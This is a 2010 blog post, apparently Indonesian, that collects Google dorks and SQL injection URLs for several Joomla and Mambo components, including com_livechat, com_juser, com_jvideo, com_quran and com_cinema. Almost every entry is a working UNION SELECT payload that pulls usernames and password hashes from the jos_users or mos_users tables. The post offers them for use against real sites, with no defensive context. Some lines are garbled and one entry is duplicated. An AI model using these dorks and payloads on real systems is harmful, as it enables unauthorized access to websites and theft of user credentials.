Recent Posts



Minggu, 26 September 2010

Joomla bugs

08.25    No comments
Dork:
allinurlption=com_livechat

Exploit :
administrator/components/com_livechat/getChat.php?chat=0&last=1=+union+select+
1,unhex(hex(concat(username,0×3a,password))),3,4+ from+jos_users

administrator/components/com_livechat/getSavedChatRooms.php?chat=
0&last=1+union+select+1,unhex(hex(concat(usernam e, 0×3a,password))),3+from+jos_users

Joomla “option=com_juser”
info http://milw0rm.com/exploits/8847

Dork:
inurlption=com_juser

exploit:
index.php?option=com_juser&task=show_profile&id=70 +and+1=2+union+select+1,2,concat
(username,0×3a,password)chipdebi0s,4,5,6,7,8,9,10 ,11,12,13+from+jos_users–

Joomla “com_jvideo”
info dari http://milw0rm.com/exploits/8821

Dork :
inurlption=com_jvideo
inurl:com_jvideo

exploit:
index.php?option=com_jvideo&view=user&user_id=62+a nd%201=2+union+select+concat
(username,0×3a,password)+from+jos_users

Joomla “option=com_juser”
info http://milw0rm.com/exploits/8847

Dork:
inurlption=com_juser

exploit:
Code:
index.php?option=com_juser&task=show_profile&id=70 +and+1=2+union+select+1,2,concat
(username,0×3a,password)chipdebi0s,4,5,6,7,8,9,10 ,11,12,13+from+jos_users–

Joomla com_ewriting

Dorks:
allinurl:”com_ewriting”

Exploit :
Joomla!
index.php?option=com_ewriting&Itemid=9999&func=sel ectcat&cat=-1+UNION+ALL+SELECT+
1,2,concat(username,0×3a,password),4,5,6,7,8,9,10 +FROM+jos_users–

Mambo
index.php?option=com_ewriting&Itemid=9999&func=sel ectcat&cat=-1+UNION+ALL+SELECT+
1,2,concat(username,0×3a,password),4,5,6,7,8,9,10 +FROM+mos_users–

Joomla com_simple_review Sql injection

Dork:
inurl:”com_simple_review”

Exploit:
index.php?option=com_simple_review&category=4+AND+ 1=2+UNION+SELECT+0,concat_ws
(username,0×3a,password),2+from+jos_users–

Joomla Qur’an component

DORK :
inurl:”/index.php?option=com_quran”
allinurl:”com_quran”

Exploit :

Mambo
index.php?option=com_quran&action=viewayat&surano=-1+union+all+select+1,concat
(username,0×3a,password ),3,4,5+from+mos_users+limit+0,20–

Joomla
index.php?option=com_quran&action=viewayat&surano=-1+union+all+select+1,concat
(username,0×3a,password ),3,4,5+from+jos_users+limit+0,20–

Joomla Component com_cinema SQL Injection

DORK
allinurl: “com_cinema”

EXPLOiT 1 :
index.php?option=com_cinema&Itemid=S@BUN&func=deta il&id=-99999/**/union/**/select/
**/0,1,0×3a,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,1 8 ,19,20,21,22,23,24,25,26,27,28,29,30,
31,32,concat(username,0×3a,password)/**/from/**/jos_users/*

EXPLOiT 2 :
[/i]index.php?option=com_cinema&Itemid=S@BUN&func=deta il&id=-99999/**/union/**/select/
**/0,1,0×3a,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,1 8 ,19,20,21,22,23,24,25,26,27,29,29,30,
concat(username,0×3a,password)/**/from/**/jos_users/*

Joomla Component joomradio Remote SQL Injection

DORK:
inurl:com_joomradio

Exploit :
Code:
index.php?option=com_joomradio&page=show_video&id=-1 UNION SELECT user(),concat(username,0×3a,password),user(),user (),user(),user(),user() FROM jos_users–

0 komentar:

Posting Komentar

Langganan: Posting Komentar (Atom)